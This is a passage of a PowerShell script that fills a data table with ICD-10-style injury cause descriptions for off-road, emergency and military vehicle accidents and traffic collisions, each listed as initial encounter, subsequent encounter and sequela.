= $DiagnosisList.Rows.Add("Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of dirt bike or motor/cross bike injured in traffic accident","Passenger of dirt bike or motor/cross bike injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dirt bike or motor/cross bike injured in traffic accident","Passenger of dirt bike or motor/cross bike injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dirt bike or motor/cross bike injured in traffic accident","Passenger of dirt bike or motor/cross bike injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of other special all-terrain or other off-road motor vehicle injured in traffic accident","Passenger of other special all-terrain or other off-road motor vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of other special all-terrain or other off-road motor vehicle injured in traffic accident","Passenger of other special all-terrain or other off-road motor vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of other special all-terrain or other off-road motor vehicle injured in traffic accident","Passenger of other special all-terrain or other off-road motor vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of ambulance or fire engine injured in traffic accident","Person on outside of ambulance or fire engine injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of ambulance or fire engine injured in traffic accident","Person on outside of ambulance or fire engine injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of ambulance or fire engine injured in traffic accident","Person on outside of ambulance or fire engine injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of snowmobile injured in traffic accident","Person on outside of snowmobile injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of snowmobile injured in traffic accident","Person on outside of snowmobile injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of snowmobile injured in traffic accident","Person on outside of snowmobile injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of dune buggy injured in traffic accident","Person on outside of dune buggy injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dune buggy injured in traffic accident","Person on outside of dune buggy injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dune buggy injured in traffic accident","Person on outside of dune buggy injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of military vehicle injured in traffic accident","Person on outside of military vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of military vehicle injured in traffic accident","Person on outside of military vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of military vehicle injured in traffic accident","Person on outside of military vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of dirt bike or motor/cross bike injured in traffic accident","Person on outside of dirt bike or motor/cross bike injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dirt bike or motor/cross bike injured in traffic accident","Person on outside of dirt bike or motor/cross bike injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dirt bike or motor/cross bike injured in traffic accident","Person on outside of dirt bike or motor/cross bike injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of other special all-terrain or other off-road motor vehicle injured in traffic accident","Person on outside of other special all-terrain or other off-road motor vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of other special all-terrain or other off-road motor vehicle injured in traffic accident","Person on outside of other special all-terrain or other off-road motor vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of other special all-terrain or other off-road motor vehicle injured in traffic accident","Person on outside of other special all-terrain or other off-road motor vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of ambulance or fire engine injured in traffic accident","Unspecified occupant of ambulance or fire engine injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of ambulance or fire engine injured in traffic accident","Unspecified occupant of ambulance or fire engine injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of ambulance or fire engine injured in traffic accident","Unspecified occupant of ambulance or fire engine injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of snowmobile injured in traffic accident","Unspecified occupant of snowmobile injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of snowmobile injured in traffic accident","Unspecified occupant of snowmobile injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of snowmobile injured in traffic accident","Unspecified occupant of snowmobile injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dune buggy injured in traffic accident","Unspecified occupant of dune buggy injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dune buggy injured in traffic accident","Unspecified occupant of dune buggy injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dune buggy injured in traffic accident","Unspecified occupant of dune buggy injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of military vehicle injured in traffic accident","Unspecified occupant of military vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of military vehicle injured in traffic accident","Unspecified occupant of military vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of military vehicle injured in traffic accident","Unspecified occupant of military vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dirt bike or motor/cross bike injured in traffic accident","Unspecified occupant of dirt bike or motor/cross bike injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dirt bike or motor/cross bike injured in traffic accident","Unspecified occupant of dirt bike or motor/cross bike injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dirt bike or motor/cross bike injured in traffic accident","Unspecified occupant of dirt bike or motor/cross bike injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in traffic accident","Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in traffic accident","Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in traffic accident","Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from ambulance or fire engine","Person injured while boarding or alighting from ambulance or fire engine, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from ambulance or fire engine","Person injured while boarding or alighting from ambulance or fire engine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from ambulance or fire engine","Person injured while boarding or alighting from ambulance or fire engine, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from snowmobile","Person injured while boarding or alighting from snowmobile, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from snowmobile","Person injured while boarding or alighting from snowmobile, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from snowmobile","Person injured while boarding or alighting from snowmobile, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from dune buggy","Person injured while boarding or alighting from dune buggy, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from dune buggy","Person injured while boarding or alighting from dune buggy, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from dune buggy","Person injured while boarding or alighting from dune buggy, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from military vehicle","Person injured while boarding or alighting from military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from military vehicle","Person injured while boarding or alighting from military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from military vehicle","Person injured while boarding or alighting from military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from a 3- or 4- wheeled all-terrain vehicle (ATV)","Person injured while boarding or alighting from a 3- or 4- wheeled all-terrain vehicle (ATV), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from a 3- or 4- wheeled all-terrain vehicle (ATV)","Person injured while boarding or alighting from a 3- or 4- wheeled all-terrain vehicle (ATV), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from a 3- or 4- wheeled all-terrain vehicle (ATV)","Person injured while boarding or alighting from a 3- or 4- wheeled all-terrain vehicle (ATV), sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from a dirt bike or motor/cross bike","Person injured while boarding or alighting from a dirt bike or motor/cross bike, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from a dirt bike or motor/cross bike","Person injured while boarding or alighting from a dirt bike or motor/cross bike, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from a dirt bike or motor/cross bike","Person injured while boarding or alighting from a dirt bike or motor/cross bike, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from other special all-terrain or other off-road motor vehicle","Person injured while boarding or alighting from other special all-terrain or other off-road motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from other special all-terrain or other off-road motor vehicle","Person injured while boarding or alighting from other special all-terrain or other off-road motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from other special all-terrain or other off-road motor vehicle","Person injured while boarding or alighting from other special all-terrain or other off-road motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of ambulance or fire engine injured in nontraffic accident","Driver of ambulance or fire engine injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of ambulance or fire engine injured in nontraffic accident","Driver of ambulance or fire engine injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of ambulance or fire engine injured in nontraffic accident","Driver of ambulance or fire engine injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of snowmobile injured in nontraffic accident","Driver of snowmobile injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of snowmobile injured in nontraffic accident","Driver of snowmobile injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of snowmobile injured in nontraffic accident","Driver of snowmobile injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of dune buggy injured in nontraffic accident","Driver of dune buggy injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of dune buggy injured in nontraffic accident","Driver of dune buggy injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of dune buggy injured in nontraffic accident","Driver of dune buggy injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of military vehicle injured in nontraffic accident","Driver of military vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of military vehicle injured in nontraffic accident","Driver of military vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of military vehicle injured in nontraffic accident","Driver of military vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of dirt bike or motor/cross bike injured in nontraffic accident","Driver of dirt bike or motor/cross bike injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of dirt bike or motor/cross bike injured in nontraffic accident","Driver of dirt bike or motor/cross bike injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of dirt bike or motor/cross bike injured in nontraffic accident","Driver of dirt bike or motor/cross bike injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Driver of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Driver of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Driver of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of ambulance or fire engine injured in nontraffic accident","Passenger of ambulance or fire engine injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of ambulance or fire engine injured in nontraffic accident","Passenger of ambulance or fire engine injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of ambulance or fire engine injured in nontraffic accident","Passenger of ambulance or fire engine injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of snowmobile injured in nontraffic accident","Passenger of snowmobile injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of snowmobile injured in nontraffic accident","Passenger of snowmobile injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of snowmobile injured in nontraffic accident","Passenger of snowmobile injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of dune buggy injured in nontraffic accident","Passenger of dune buggy injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dune buggy injured in nontraffic accident","Passenger of dune buggy injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dune buggy injured in nontraffic accident","Passenger of dune buggy injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of military vehicle injured in nontraffic accident","Passenger of military vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of military vehicle injured in nontraffic accident","Passenger of military vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of military vehicle injured in nontraffic accident","Passenger of military vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Passenger of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of dirt bike or motor/cross bike injured in nontraffic accident","Passenger of dirt bike or motor/cross bike injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dirt bike or motor/cross bike injured in nontraffic accident","Passenger of dirt bike or motor/cross bike injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dirt bike or motor/cross bike injured in nontraffic accident","Passenger of dirt bike or motor/cross bike injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Passenger of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Passenger of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Passenger of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of ambulance or fire engine injured in nontraffic accident","Person on outside of ambulance or fire engine injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of ambulance or fire engine injured in nontraffic accident","Person on outside of ambulance or fire engine injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of ambulance or fire engine injured in nontraffic accident","Person on outside of ambulance or fire engine injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of snowmobile injured in nontraffic accident","Person on outside of snowmobile injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of snowmobile injured in nontraffic accident","Person on outside of snowmobile injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of snowmobile injured in nontraffic accident","Person on outside of snowmobile injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of dune buggy injured in nontraffic accident","Person on outside of dune buggy injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dune buggy injured in nontraffic accident","Person on outside of dune buggy injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dune buggy injured in nontraffic accident","Person on outside of dune buggy injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of military vehicle injured in nontraffic accident","Person on outside of military vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of military vehicle injured in nontraffic accident","Person on outside of military vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of military vehicle injured in nontraffic accident","Person on outside of military vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Person on outside of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of dirt bike or motor/cross bike injured in nontraffic accident","Person on outside of dirt bike or motor/cross bike injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dirt bike or motor/cross bike injured in nontraffic accident","Person on outside of dirt bike or motor/cross bike injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of dirt bike or motor/cross bike injured in nontraffic accident","Person on outside of dirt bike or motor/cross bike injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of other special all-terrain or other off-road motor vehicles injured in nontraffic accident","Person on outside of other special all-terrain or other off-road motor vehicles injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of other special all-terrain or other off-road motor vehicles injured in nontraffic accident","Person on outside of other special all-terrain or other off-road motor vehicles injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of other special all-terrain or other off-road motor vehicles injured in nontraffic accident","Person on outside of other special all-terrain or other off-road motor vehicles injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of ambulance or fire engine injured in nontraffic accident","Unspecified occupant of ambulance or fire engine injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of ambulance or fire engine injured in nontraffic accident","Unspecified occupant of ambulance or fire engine injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of ambulance or fire engine injured in nontraffic accident","Unspecified occupant of ambulance or fire engine injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of snowmobile injured in nontraffic accident","Unspecified occupant of snowmobile injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of snowmobile injured in nontraffic accident","Unspecified occupant of snowmobile injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of snowmobile injured in nontraffic accident","Unspecified occupant of snowmobile injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dune buggy injured in nontraffic accident","Unspecified occupant of dune buggy injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dune buggy injured in nontraffic accident","Unspecified occupant of dune buggy injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dune buggy injured in nontraffic accident","Unspecified occupant of dune buggy injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of military vehicle injured in nontraffic accident","Unspecified occupant of military vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of military vehicle injured in nontraffic accident","Unspecified occupant of military vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of military vehicle injured in nontraffic accident","Unspecified occupant of military vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident","Unspecified occupant of 3- or 4- wheeled all-terrain vehicle (ATV) injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dirt bike or motor/cross bike injured in nontraffic accident","Unspecified occupant of dirt bike or motor/cross bike injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dirt bike or motor/cross bike injured in nontraffic accident","Unspecified occupant of dirt bike or motor/cross bike injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of dirt bike or motor/cross bike injured in nontraffic accident","Unspecified occupant of dirt bike or motor/cross bike injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in nontraffic accident","Unspecified occupant of other special all-terrain or other off-road motor vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and two- or three-wheeled powered vehicle (traffic)","Person injured in collision between car and two- or three-wheeled powered vehicle (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and two- or three-wheeled powered vehicle (traffic)","Person injured in collision between car and two- or three-wheeled powered vehicle (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and two- or three-wheeled powered vehicle (traffic)","Person injured in collision between car and two- or three-wheeled powered vehicle (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle (traffic)","Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle (traffic)","Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle (traffic)","Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and pick-up truck or van (traffic)","Person injured in collision between car and pick-up truck or van (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and pick-up truck or van (traffic)","Person injured in collision between car and pick-up truck or van (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and pick-up truck or van (traffic)","Person injured in collision between car and pick-up truck or van (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and bus (traffic)","Person injured in collision between car and bus (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and bus (traffic)","Person injured in collision between car and bus (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and bus (traffic)","Person injured in collision between car and bus (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and heavy transport vehicle (traffic)","Person injured in collision between car and heavy transport vehicle (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and heavy transport vehicle (traffic)","Person injured in collision between car and heavy transport vehicle (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and heavy transport vehicle (traffic)","Person injured in collision between car and heavy transport vehicle (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between heavy transport vehicle and bus (traffic)","Person injured in collision between heavy transport vehicle and bus (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between heavy transport vehicle and bus (traffic)","Person injured in collision between heavy transport vehicle and bus (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between heavy transport vehicle and bus (traffic)","Person injured in collision between heavy transport vehicle and bus (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between railway train or railway vehicle and car (traffic)","Person injured in collision between railway train or railway vehicle and car (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between railway train or railway vehicle and car (traffic)","Person injured in collision between railway train or railway vehicle and car (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between railway train or railway vehicle and car (traffic)","Person injured in collision between railway train or railway vehicle and car (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other specified motor vehicles (traffic)","Person injured in collision between other specified motor vehicles (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other specified motor vehicles (traffic)","Person injured in collision between other specified motor vehicles (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other specified motor vehicles (traffic)","Person injured in collision between other specified motor vehicles (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in other specified noncollision transport accidents involving motor vehicle (traffic)","Person injured in other specified noncollision transport accidents involving motor vehicle (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified noncollision transport accidents involving motor vehicle (traffic)","Person injured in other specified noncollision transport accidents involving motor vehicle (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified noncollision transport accidents involving motor vehicle (traffic)","Person injured in other specified noncollision transport accidents involving motor vehicle (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in other specified (collision)(noncollision) 